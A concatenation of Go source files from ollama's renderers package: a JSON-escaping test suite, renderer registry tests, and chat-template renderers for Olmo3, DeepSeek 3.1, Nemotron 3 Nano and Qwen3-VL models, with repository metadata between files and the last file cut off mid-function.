package renderers import ( "testing" "github.com/google/go-cmp/cmp" ) func TestMarshalWithSpaces(t *testing.T) { tests := []struct { name string input any expected string }{ // basic formatting tests { name: "simple object", input: map[string]any{"key": "value"}, expected: `{"key": "value"}`, }, { name: "simple array", input: []any{"a", "b", "c"}, expected: `["a", "b", "c"]`, }, // escaped quotes { name: "escaped quote in string", input: map[string]any{"text": `quote"inside`}, expected: `{"text": "quote\"inside"}`, }, { name: "multiple escaped quotes", input: map[string]any{"text": `say "hello" and "goodbye"`}, expected: `{"text": "say \"hello\" and \"goodbye\""}`, }, // escaped backslashes { name: "escaped backslash", input: map[string]any{"path": `C:\windows\system32`}, expected: `{"path": "C:\\windows\\system32"}`, }, { name: "double backslash", input: map[string]any{"text": `test\\more`}, expected: `{"text": "test\\\\more"}`, }, { name: "backslash before quote", input: map[string]any{"text": `end with \"`}, expected: `{"text": "end with \\\""}`, }, // standard JSON escape sequences { name: "newline in string", input: map[string]any{"text": "line1\nline2"}, expected: `{"text": "line1\nline2"}`, }, { name: "tab in string", input: map[string]any{"text": "before\tafter"}, expected: `{"text": "before\tafter"}`, }, { name: "carriage return", input: map[string]any{"text": "before\rafter"}, expected: `{"text": "before\rafter"}`, }, { name: "multiple escape sequences", input: map[string]any{"text": "line1\nline2\ttab\rcarriage"}, expected: `{"text": "line1\nline2\ttab\rcarriage"}`, }, // strings containing colons and commas (no spaces should be added inside) { name: "colon in string", input: map[string]any{"url": "http://example.com"}, expected: `{"url": "http://example.com"}`, }, { name: "comma in string", input: map[string]any{"list": "apple, banana, cherry"}, expected: `{"list": "apple, banana, cherry"}`, }, { name: "colon and comma in string", input: 
map[string]any{"data": "key:value, key2:value2"}, expected: `{"data": "key:value, key2:value2"}`, }, // unicode characters { name: "emoji", input: map[string]any{"emoji": "😀🎉✨"}, expected: `{"emoji": "😀🎉✨"}`, }, { name: "chinese characters", input: map[string]any{"text": "你好世界"}, expected: `{"text": "你好世界"}`, }, { name: "arabic characters", input: map[string]any{"text": "مرحبا"}, expected: `{"text": "مرحبا"}`, }, { name: "mixed unicode and ascii", input: map[string]any{"text": "Hello 世界! 😀"}, expected: `{"text": "Hello 世界! 😀"}`, }, { name: "unicode with special symbols", input: map[string]any{"text": "®©™€£¥"}, expected: `{"text": "®©™€£¥"}`, }, // complex combinations - strings that look like JSON { name: "json string inside value", input: map[string]any{"nested": `{"key":"value"}`}, expected: `{"nested": "{\"key\":\"value\"}"}`, }, { name: "json array inside value", input: map[string]any{"array": `["a","b","c"]`}, expected: `{"array": "[\"a\",\"b\",\"c\"]"}`, }, // edge cases { name: "empty string", input: map[string]any{"empty": ""}, expected: `{"empty": ""}`, }, { name: "empty object", input: map[string]any{}, expected: `{}`, }, { name: "empty array", input: []any{}, expected: `[]`, }, { name: "numbers", input: map[string]any{"int": 42, "float": 3.14}, expected: `{"float": 3.14, "int": 42}`, }, { name: "boolean", input: map[string]any{"bool": true, "other": false}, expected: `{"bool": true, "other": false}`, }, { name: "null value", input: map[string]any{"value": nil}, expected: `{"value": null}`, }, // nested structures with complex strings { name: "nested object with escapes", input: map[string]any{ "outer": map[string]any{ "path": `C:\folder\file.txt`, "quote": `He said "hi"`, }, }, expected: `{"outer": {"path": "C:\\folder\\file.txt", "quote": "He said \"hi\""}}`, }, { name: "array with unicode and escapes", input: []any{ "normal", "with\nnewline", "with\"quote", "emoji😀", "colon:comma,", }, expected: `["normal", "with\nnewline", "with\"quote", "emoji😀", 
"colon:comma,"]`, }, { name: "backslash at positions before special chars", input: map[string]any{"text": `a\b:c\d,e`}, expected: `{"text": "a\\b:c\\d,e"}`, }, { name: "multiple backslashes before quote", input: map[string]any{"text": `ends\\"`}, expected: `{"text": "ends\\\\\""}`, }, { name: "unicode with escapes", input: map[string]any{"text": "Hello\n世界\t😀"}, expected: `{"text": "Hello\n世界\t😀"}`, }, // Real-world tool call example { name: "tool call arguments", input: map[string]any{ "location": "San Francisco, CA", "unit": "fahrenheit", "format": "json", }, expected: `{"format": "json", "location": "San Francisco, CA", "unit": "fahrenheit"}`, }, { name: "complex tool arguments with escapes", input: map[string]any{ "query": `SELECT * FROM "users" WHERE name = 'O'Brien'`, "description": "Fetch user\ndata from DB", "path": `C:\data\users.db`, }, expected: `{"description": "Fetch user\ndata from DB", "path": "C:\\data\\users.db", "query": "SELECT * FROM \"users\" WHERE name = 'O'Brien'"}`, }, { name: "unicode immediately adjacent to JSON structure chars", input: map[string]any{"😀key": "😀value", "test": "😀:😀,😀"}, expected: `{"test": "😀:😀,😀", "😀key": "😀value"}`, }, { name: "long unicode string stress test", input: map[string]any{"text": "😀😁😂😃😄😅😆😇😈😉😊😋😌😍😎😏😐😑😒😓😔😕😖😗😘😙😚😛😜😝😞😟"}, expected: `{"text": "😀😁😂😃😄😅😆😇😈😉😊😋😌😍😎😏😐😑😒😓😔😕😖😗😘😙😚😛😜😝😞😟"}`, }, { name: "deeply nested with unicode everywhere", input: map[string]any{ "😀": map[string]any{ "你好": []any{"مرحبا", "®©™", "∑∫∂√"}, }, }, expected: `{"😀": {"你好": ["مرحبا", "®©™", "∑∫∂√"]}}`, }, { name: "unicode with all JSON special chars interleaved", input: map[string]any{"k😀:k": "v😀,v", "a:😀": "b,😀", "😀": ":,😀,:"}, expected: `{"a:😀": "b,😀", "k😀:k": "v😀,v", "😀": ":,😀,:"}`, }, { name: "combining diacritics and RTL text", input: map[string]any{"hebrew": "עִבְרִית", "combined": "é̀ñ", "mixed": "test:עִבְרִית,é̀ñ"}, expected: `{"combined": "é̀ñ", "hebrew": "עִבְרִית", "mixed": "test:עִבְרִית,é̀ñ"}`, }, { name: "pathological case: unicode + 
escapes + special chars", input: map[string]any{"😀": "test\n😀\"quote😀\\backslash😀:colon😀,comma😀"}, expected: `{"😀": "test\n😀\"quote😀\\backslash😀:colon😀,comma😀"}`, }, // all JSON structural characters inside strings { name: "braces and brackets in strings", input: map[string]any{"text": "test{with}braces[and]brackets"}, expected: `{"text": "test{with}braces[and]brackets"}`, }, { name: "braces and brackets with colons and commas", input: map[string]any{"code": "{key:value,[1,2,3]}"}, expected: `{"code": "{key:value,[1,2,3]}"}`, }, { name: "json-like string with all structural chars", input: map[string]any{"schema": `{"type":"object","properties":{"name":{"type":"string"},"items":{"type":"array"}}}`}, expected: `{"schema": "{\"type\":\"object\",\"properties\":{\"name\":{\"type\":\"string\"},\"items\":{\"type\":\"array\"}}}"}`, }, // forward slash tests (JSON allows \/ as an escape sequence) { name: "forward slash in URL", input: map[string]any{"url": "https://example.com/path/to/resource"}, expected: `{"url": "https://example.com/path/to/resource"}`, }, { name: "regex pattern with slashes", input: map[string]any{"regex": "/[a-z]+/gi"}, expected: `{"regex": "/[a-z]+/gi"}`, }, // all JSON escape sequences { name: "backspace escape", input: map[string]any{"text": "before\bafter"}, expected: `{"text": "before\bafter"}`, }, { name: "form feed escape", input: map[string]any{"text": "before\fafter"}, expected: `{"text": "before\fafter"}`, }, { name: "all standard escapes combined", input: map[string]any{"text": "\"\\\b\f\n\r\t"}, expected: `{"text": "\"\\\b\f\n\r\t"}`, }, // unicode escape sequences { name: "string that forces unicode escapes", input: map[string]any{"control": "\u0000\u0001\u001f"}, expected: `{"control": "\u0000\u0001\u001f"}`, }, // empty objects and arrays nested with strings { name: "nested empty structures with string values", input: map[string]any{"empty_obj": map[string]any{}, "empty_arr": []any{}, "text": "{}[]"}, expected: `{"empty_arr": [], 
"empty_obj": {}, "text": "{}[]"}`, }, // complex nesting with all structural characters { name: "deeply nested with all char types", input: map[string]any{ "level1": map[string]any{ "array": []any{ map[string]any{"nested": "value:with,special{chars}[here]"}, []any{"a", "b", "c"}, }, }, }, expected: `{"level1": {"array": [{"nested": "value:with,special{chars}[here]"}, ["a", "b", "c"]]}}`, }, // string containing escaped structural characters { name: "string with multiple escape sequences and structural chars", input: map[string]any{"data": "test\"quote\"{brace}[bracket]:colon,comma\\backslash/slash"}, expected: `{"data": "test\"quote\"{brace}[bracket]:colon,comma\\backslash/slash"}`, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result, err := marshalWithSpaces(tt.input) if err != nil { t.Fatalf("marshalWithSpaces failed: %v", err) } resultStr := string(result) if diff := cmp.Diff(resultStr, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/renderer_test.go
model/renderers/renderer_test.go
package renderers import ( "testing" "github.com/ollama/ollama/api" ) type mockRenderer struct{} func (m *mockRenderer) Render(msgs []api.Message, tools []api.Tool, think *api.ThinkValue) (string, error) { return "mock-output", nil } func TestRegisterCustomRenderer(t *testing.T) { // Register a custom renderer Register("custom-renderer", func() Renderer { return &mockRenderer{} }) // Retrieve and use it result, err := RenderWithRenderer("custom-renderer", nil, nil, nil) if err != nil { t.Fatalf("unexpected error: %v", err) } if result != "mock-output" { t.Errorf("expected 'mock-output', got %q", result) } } func TestBuiltInRendererStillWorks(t *testing.T) { // Test that qwen3-coder still works messages := []api.Message{ {Role: "user", Content: "Hello"}, } result, err := RenderWithRenderer("qwen3-coder", messages, nil, nil) if err != nil { t.Fatalf("unexpected error: %v", err) } if result == "" { t.Error("expected non-empty result from qwen3-coder renderer") } } func TestOverrideBuiltInRenderer(t *testing.T) { // Override the built-in renderer Register("qwen3-coder", func() Renderer { return &mockRenderer{} }) // Should get the override result, err := RenderWithRenderer("qwen3-coder", nil, nil, nil) if err != nil { t.Fatalf("unexpected error: %v", err) } if result != "mock-output" { t.Errorf("expected 'mock-output' from override, got %q", result) } } func TestUnknownRendererReturnsError(t *testing.T) { _, err := RenderWithRenderer("nonexistent-renderer", nil, nil, nil) if err == nil { t.Error("expected error for unknown renderer") } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3_think.go
model/renderers/olmo3_think.go
package renderers import ( "strings" "github.com/ollama/ollama/api" ) type Olmo3ThinkVariant int const ( // Olmo3Think32B is for allenai/Olmo-3-32B-Think Olmo3Think32B Olmo3ThinkVariant = iota // Olmo31Think is for allenai/Olmo-3-7B-Think and allenai/Olmo-3.1-32B-Think (includes model info) Olmo31Think ) const ( olmo3ThinkFunctionsSuffix = " You do not currently have access to any functions. <functions></functions>" olmo3Think32BSystemMessage = "You are a helpful AI assistant." olmo31ThinkSystemMessage = "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai." ) type Olmo3ThinkRenderer struct { Variant Olmo3ThinkVariant } func (r *Olmo3ThinkRenderer) Render(messages []api.Message, _ []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder var systemMessage *api.Message filteredMessages := make([]api.Message, 0, len(messages)) for i, message := range messages { if message.Role == "system" { if systemMessage == nil { systemMessage = &messages[i] } continue } // Skip tool messages - Think models don't support tools if message.Role == "tool" { continue } filteredMessages = append(filteredMessages, message) } sb.WriteString("<|im_start|>system\n") if systemMessage != nil { sb.WriteString(systemMessage.Content) sb.WriteString(olmo3ThinkFunctionsSuffix) } else { // Default system message varies by variant switch r.Variant { case Olmo3Think32B: sb.WriteString(olmo3Think32BSystemMessage) default: // Olmo3Think7B, Olmo31Think use same template - diverges from HF but confirmed difference from team sb.WriteString(olmo31ThinkSystemMessage) } } sb.WriteString("<|im_end|>\n") for _, message := range filteredMessages { switch message.Role { case "user": sb.WriteString("<|im_start|>user\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") case "assistant": sb.WriteString("<|im_start|>assistant\n") if message.Content != "" { 
sb.WriteString(message.Content) } sb.WriteString("<|im_end|>\n") } } // Always add generation prompt with <think> tag for thinking models sb.WriteString("<|im_start|>assistant\n<think>") return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3.go
model/renderers/olmo3.go
package renderers import ( "encoding/json" "fmt" "sort" "strings" "github.com/ollama/ollama/api" ) const ( olmo3DefaultSystemMessage = "You are a helpful function-calling AI assistant. " olmo31DefaultSystemMessage = "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai. " olmo3NoFunctionsMessage = "You do not currently have access to any functions. " olmo3WithFunctionsMessage = "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." ) type Olmo3Renderer struct { UseExtendedSystemMessage bool } func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder var systemMessage *api.Message filteredMessages := make([]api.Message, 0, len(messages)) for i, message := range messages { if message.Role == "system" { if systemMessage == nil { systemMessage = &messages[i] } continue } filteredMessages = append(filteredMessages, message) } // Render system message if systemMessage != nil { // Custom system message - single newline after "system" sb.WriteString("<|im_start|>system\n") sb.WriteString(systemMessage.Content) if len(tools) > 0 { functionsJSON, err := marshalWithSpaces(tools) if err != nil { return "", err } sb.WriteString("<functions>") sb.WriteString(string(functionsJSON)) sb.WriteString("</functions>") } sb.WriteString("<|im_end|>\n") } else { // Default system message - single newline after "system" sb.WriteString("<|im_start|>system\n") if r.UseExtendedSystemMessage { sb.WriteString(olmo31DefaultSystemMessage) } else { sb.WriteString(olmo3DefaultSystemMessage) } if len(tools) > 0 { functionsJSON, err := marshalWithSpaces(tools) if err != nil { return "", err 
} sb.WriteString(olmo3WithFunctionsMessage) sb.WriteString("<functions>") sb.WriteString(string(functionsJSON)) sb.WriteString("</functions>") } else { sb.WriteString(olmo3NoFunctionsMessage) sb.WriteString("<functions></functions>") } sb.WriteString("<|im_end|>\n") } for i, message := range filteredMessages { lastMessage := i == len(filteredMessages)-1 switch message.Role { case "user": sb.WriteString("<|im_start|>user\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") case "assistant": sb.WriteString("<|im_start|>assistant\n") if message.Content != "" { sb.WriteString(message.Content) } if len(message.ToolCalls) > 0 { sb.WriteString("<function_calls>") for j, tc := range message.ToolCalls { // Format as function_name(arg1="value1", arg2="value2") sb.WriteString(tc.Function.Name) sb.WriteString("(") // Get sorted keys for deterministic output keys := make([]string, 0, tc.Function.Arguments.Len()) for k := range tc.Function.Arguments.All() { keys = append(keys, k) } sort.Strings(keys) for k, key := range keys { if k > 0 { sb.WriteString(", ") } val, _ := tc.Function.Arguments.Get(key) value, err := json.Marshal(val) if err != nil { return "", err } sb.WriteString(fmt.Sprintf("%s=%s", key, string(value))) } sb.WriteString(")") if j < len(message.ToolCalls)-1 { sb.WriteString("\n") } } sb.WriteString("</function_calls>") } // Add end tag unless it's the last message with content only (prefill) if !lastMessage || len(message.ToolCalls) > 0 { sb.WriteString("<|im_end|>\n") } case "tool": sb.WriteString("<|im_start|>environment\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") } } // Add generation prompt if needed needsGenerationPrompt := true if len(filteredMessages) > 0 { lastMsg := filteredMessages[len(filteredMessages)-1] if lastMsg.Role == "assistant" && len(lastMsg.ToolCalls) == 0 && lastMsg.Content != "" { needsGenerationPrompt = false } } if needsGenerationPrompt { sb.WriteString("<|im_start|>assistant\n") } return sb.String(), 
nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/deepseek3.go
model/renderers/deepseek3.go
package renderers import ( "encoding/json" "strings" "github.com/ollama/ollama/api" ) type DeepSeek3Variant int const ( Deepseek31 DeepSeek3Variant = iota ) type DeepSeek3Renderer struct { IsThinking bool Variant DeepSeek3Variant } func (r *DeepSeek3Renderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder // thinking is enabled: model must support it AND user must request it thinking := r.IsThinking && (thinkValue != nil && thinkValue.Bool()) // extract system messages first var systemPrompt strings.Builder isFirstSystemPrompt := true for _, message := range messages { if message.Role == "system" { if isFirstSystemPrompt { systemPrompt.WriteString(message.Content) isFirstSystemPrompt = false } else { systemPrompt.WriteString("\n\n" + message.Content) } } } sb.WriteString("<|begin▁of▁sentence|>") sb.WriteString(systemPrompt.String()) // tool definitions if len(tools) > 0 { sb.WriteString("\n\n## Tools\nYou have access to the following tools:\n") for _, tool := range tools { sb.WriteString("\n### " + tool.Function.Name) sb.WriteString("\nDescription: " + tool.Function.Description) // parameters as JSON parametersJSON, err := json.Marshal(tool.Function.Parameters) if err == nil { sb.WriteString("\n\nParameters: " + string(parametersJSON) + "\n") } } // usage instructions sb.WriteString("\nIMPORTANT: ALWAYS adhere to this exact format for tool use:\n") sb.WriteString("<|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|>\n\n") sb.WriteString("Where:\n\n") sb.WriteString("- `tool_call_name` must be an exact match to one of the available tools\n") sb.WriteString("- `tool_call_arguments` must be valid JSON that strictly follows the tool's Parameters Schema\n") sb.WriteString("- For multiple tool calls, chain them directly without separators or spaces\n") } // state tracking isTool := false isLastUser := false // 
Find the index of the last user message to determine which assistant message is "current" lastUserIndex := -1 for i := len(messages) - 1; i >= 0; i-- { if messages[i].Role == "user" { lastUserIndex = i break } } for i, message := range messages { switch message.Role { case "user": isTool = false isLastUser = true sb.WriteString("<|User|>" + message.Content) case "assistant": if len(message.ToolCalls) > 0 { if isLastUser { sb.WriteString("<|Assistant|></think>") } isLastUser = false isTool = false if message.Content != "" { sb.WriteString(message.Content) } sb.WriteString("<|tool▁calls▁begin|>") for _, toolCall := range message.ToolCalls { sb.WriteString("<|tool▁call▁begin|>" + toolCall.Function.Name + "<|tool▁sep|>") argsJSON, _ := json.Marshal(toolCall.Function.Arguments) sb.WriteString(string(argsJSON)) sb.WriteString("<|tool▁call▁end|>") } sb.WriteString("<|tool▁calls▁end|><|end▁of▁sentence|>") } else { if isLastUser { sb.WriteString("<|Assistant|>") hasThinking := message.Thinking != "" // only use <think> for the current turn (after last user message) isCurrentTurn := i > lastUserIndex if hasThinking && thinking && isCurrentTurn { sb.WriteString("<think>") } else { sb.WriteString("</think>") } } isLastUser = false content := message.Content if isTool { sb.WriteString(content + "<|end▁of▁sentence|>") isTool = false } else { if strings.Contains(content, "</think>") { parts := strings.SplitN(content, "</think>", 2) if len(parts) > 1 { content = parts[1] } } sb.WriteString(content + "<|end▁of▁sentence|>") } } case "tool": isLastUser = false isTool = true sb.WriteString("<|tool▁output▁begin|>" + message.Content + "<|tool▁output▁end|>") } } if isLastUser && !isTool { sb.WriteString("<|Assistant|>") if thinking { sb.WriteString("<think>") } else { sb.WriteString("</think>") } } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/nemotron3nano.go
model/renderers/nemotron3nano.go
package renderers import ( "encoding/json" "fmt" "strings" "github.com/ollama/ollama/api" ) type Nemotron3NanoRenderer struct{} func (r *Nemotron3NanoRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder // thinking is enabled if user requests it enableThinking := thinkValue != nil && thinkValue.Bool() // Extract system message if present var systemMessage string var loopMessages []api.Message if len(messages) > 0 && messages[0].Role == "system" { systemMessage = messages[0].Content loopMessages = messages[1:] } else { loopMessages = messages } // Find last user message index for thinking truncation lastUserIdx := -1 for i, msg := range loopMessages { if msg.Role == "user" { lastUserIdx = i } } sb.WriteString("<|im_start|>system\n") if systemMessage != "" { sb.WriteString(systemMessage) } if len(tools) > 0 { if systemMessage != "" { sb.WriteString("\n\n") } sb.WriteString(r.renderTools(tools)) } sb.WriteString("<|im_end|>\n") for i, message := range loopMessages { switch message.Role { case "assistant": // Build content with thinking tags content := r.buildContent(message) shouldTruncate := i < lastUserIdx if len(message.ToolCalls) > 0 { sb.WriteString("<|im_start|>assistant\n") sb.WriteString(r.formatContent(content, shouldTruncate, true)) r.writeToolCalls(&sb, message.ToolCalls) sb.WriteString("<|im_end|>\n") } else { formatted := r.formatContent(content, shouldTruncate, false) sb.WriteString("<|im_start|>assistant\n" + formatted + "<|im_end|>\n") } case "user", "system": sb.WriteString("<|im_start|>" + message.Role + "\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") case "tool": // Check if previous message was also a tool message prevWasTool := i > 0 && loopMessages[i-1].Role == "tool" nextIsTool := i+1 < len(loopMessages) && loopMessages[i+1].Role == "tool" if !prevWasTool { sb.WriteString("<|im_start|>user\n") } sb.WriteString("<tool_response>\n") 
sb.WriteString(message.Content) sb.WriteString("\n</tool_response>\n") if !nextIsTool { sb.WriteString("<|im_end|>\n") } default: sb.WriteString("<|im_start|>" + message.Role + "\n" + message.Content + "<|im_end|>\n") } } // Add generation prompt if enableThinking { sb.WriteString("<|im_start|>assistant\n<think>\n") } else { sb.WriteString("<|im_start|>assistant\n<think></think>") } return sb.String(), nil } func (r *Nemotron3NanoRenderer) renderTools(tools []api.Tool) string { var sb strings.Builder sb.WriteString("# Tools\n\nYou have access to the following functions:\n\n<tools>") for _, tool := range tools { fn := tool.Function sb.WriteString("\n<function>\n<name>" + fn.Name + "</name>") if fn.Description != "" { sb.WriteString("\n<description>" + strings.TrimSpace(fn.Description) + "</description>") } sb.WriteString("\n<parameters>") if fn.Parameters.Properties != nil { for paramName, paramFields := range fn.Parameters.Properties.All() { sb.WriteString("\n<parameter>") sb.WriteString("\n<name>" + paramName + "</name>") if len(paramFields.Type) > 0 { sb.WriteString("\n<type>" + strings.Join(paramFields.Type, ", ") + "</type>") } if paramFields.Description != "" { sb.WriteString("\n<description>" + strings.TrimSpace(paramFields.Description) + "</description>") } if len(paramFields.Enum) > 0 { enumJSON, _ := json.Marshal(paramFields.Enum) sb.WriteString("\n<enum>" + string(enumJSON) + "</enum>") } sb.WriteString("\n</parameter>") } } if len(fn.Parameters.Required) > 0 { reqJSON, _ := json.Marshal(fn.Parameters.Required) sb.WriteString("\n<required>" + string(reqJSON) + "</required>") } sb.WriteString("\n</parameters>") sb.WriteString("\n</function>") } sb.WriteString("\n</tools>") sb.WriteString("\n\nIf you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second 
parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n</IMPORTANT>") return sb.String() } func (r *Nemotron3NanoRenderer) buildContent(message api.Message) string { // The parser always extracts thinking into the Thinking field, // so Content will never have <think> tags embedded if message.Thinking != "" { return "<think>\n" + message.Thinking + "\n</think>\n" + message.Content } return "<think></think>" + message.Content } func (r *Nemotron3NanoRenderer) formatContent(content string, truncate bool, addNewline bool) string { if content == "" { return "<think></think>" } if !truncate { if addNewline { return strings.TrimSpace(content) + "\n" } return strings.TrimSpace(content) } // Truncate thinking - keep only content after </think> c := content if strings.Contains(c, "</think>") { parts := strings.Split(c, "</think>") c = parts[len(parts)-1] } else if strings.Contains(c, "<think>") { parts := strings.Split(c, "<think>") c = parts[0] } c = "<think></think>" + strings.TrimSpace(c) if addNewline && len(c) > len("<think></think>") { return c + "\n" } if c == "<think></think>" { return c } return strings.TrimSpace(c) } func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) { for _, tc := range toolCalls { sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n") for name, value := range tc.Function.Arguments.All() { sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + 
"\n</parameter>\n") } sb.WriteString("</function>\n</tool_call>\n") } } func (r *Nemotron3NanoRenderer) formatArgValue(value any) string { switch v := value.(type) { case map[string]any, []any: jsonBytes, _ := json.Marshal(v) return string(jsonBytes) default: return fmt.Sprintf("%v", v) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/testhelpers_test.go
model/renderers/testhelpers_test.go
package renderers import "github.com/ollama/ollama/api" // testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved) func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap { props := api.NewToolPropertiesMap() for k, v := range m { props.Set(k, v) } return props } // testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved) func testArgs(m map[string]any) api.ToolCallFunctionArguments { args := api.NewToolCallFunctionArguments() for k, v := range m { args.Set(k, v) } return args } // orderedArg represents a key-value pair for ordered argument creation type orderedArg struct { Key string Value any } // testArgsOrdered creates ToolCallFunctionArguments with a specific key order func testArgsOrdered(pairs []orderedArg) api.ToolCallFunctionArguments { args := api.NewToolCallFunctionArguments() for _, p := range pairs { args.Set(p.Key, p.Value) } return args } // orderedProp represents a key-value pair for ordered property creation type orderedProp struct { Key string Value api.ToolProperty } // testPropsOrdered creates a ToolPropertiesMap with a specific key order func testPropsOrdered(pairs []orderedProp) *api.ToolPropertiesMap { props := api.NewToolPropertiesMap() for _, p := range pairs { props.Set(p.Key, p.Value) } return props }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3vl.go
model/renderers/qwen3vl.go
package renderers import ( "strings" "github.com/ollama/ollama/api" ) type Qwen3VLRenderer struct { isThinking bool useImgTags bool } func (r *Qwen3VLRenderer) renderContent(content api.Message) string { // This assumes all images are at the front of the message - same assumption as ollama/ollama/runner.go var subSb strings.Builder for range content.Images { // TODO: (jmorganca): how to render this is different for different // model backends, and so we should eventually parameterize this or // only output a placeholder such as [img] if r.useImgTags { subSb.WriteString("[img]") } else { subSb.WriteString("<|vision_start|><|image_pad|><|vision_end|>") } } // TODO: support videos subSb.WriteString(content.Content) return subSb.String() } func (r *Qwen3VLRenderer) Render(messages []api.Message, tools []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder if len(tools) > 0 { sb.WriteString(imStartTag + "system\n") if len(messages) > 0 && messages[0].Role == "system" { sb.WriteString(messages[0].Content + "\n\n") } sb.WriteString("# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>") for _, tool := range tools { sb.WriteString("\n") if b, err := marshalWithSpaces(tool); err == nil { sb.Write(b) } } sb.WriteString("\n</tools>\n\nFor each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags:\n<tool_call>\n{\"name\": <function-name>, \"arguments\": <args-json-object>}\n</tool_call><|im_end|>\n") } else if len(messages) > 0 && messages[0].Role == "system" { sb.WriteString("<|im_start|>system\n" + messages[0].Content + "<|im_end|>\n") } multiStepTool := true lastQueryIndex := len(messages) - 1 // so this is the last user message for i := len(messages) - 1; i >= 0; i-- { message := messages[i] if multiStepTool && message.Role == "user" { // Check if content starts with <tool_response> and ends 
with </tool_response> content := r.renderContent(message) if !(strings.HasPrefix(content, "<tool_response>") && strings.HasSuffix(content, "</tool_response>")) { multiStepTool = false lastQueryIndex = i } } } for i, message := range messages { content := r.renderContent(message) lastMessage := i == len(messages)-1 prefill := lastMessage && message.Role == "assistant" if message.Role == "user" || message.Role == "system" && i != 0 { sb.WriteString("<|im_start|>" + message.Role + "\n" + content + "<|im_end|>\n") } else if message.Role == "assistant" { contentReasoning := "" if r.isThinking { if message.Thinking != "" { contentReasoning = message.Thinking } } if r.isThinking && i > lastQueryIndex { if i == len(messages)-1 || contentReasoning != "" { sb.WriteString("<|im_start|>" + message.Role + "\n<think>\n" + strings.Trim(contentReasoning, "\n")) // do we want to add a new line here? if content != "" { sb.WriteString("\n</think>\n\n" + strings.TrimLeft(content, "\n")) } } else { sb.WriteString("<|im_start|>" + message.Role + "\n" + content) } } else { sb.WriteString("<|im_start|>" + message.Role + "\n" + content) } if len(message.ToolCalls) > 0 { for j, toolCall := range message.ToolCalls { if j > 0 || content != "" { sb.WriteString("\n") } sb.WriteString("<tool_call>\n{\"name\": \"" + toolCall.Function.Name + "\", \"arguments\": ") if b, err := marshalWithSpaces(toolCall.Function.Arguments); err == nil { sb.Write(b) } sb.WriteString("}\n</tool_call>") } } if !prefill { sb.WriteString("<|im_end|>\n") } } else if message.Role == "tool" { if i == 0 || messages[i-1].Role != "tool" { sb.WriteString("<|im_start|>user") } sb.WriteString("\n<tool_response>\n" + message.Content + "\n</tool_response>") if i == len(messages)-1 || messages[i+1].Role != "tool" { sb.WriteString("<|im_end|>\n") } } // prefill at the end if lastMessage && !prefill { sb.WriteString("<|im_start|>assistant\n") if r.isThinking { sb.WriteString("<think>\n") } } } return sb.String(), 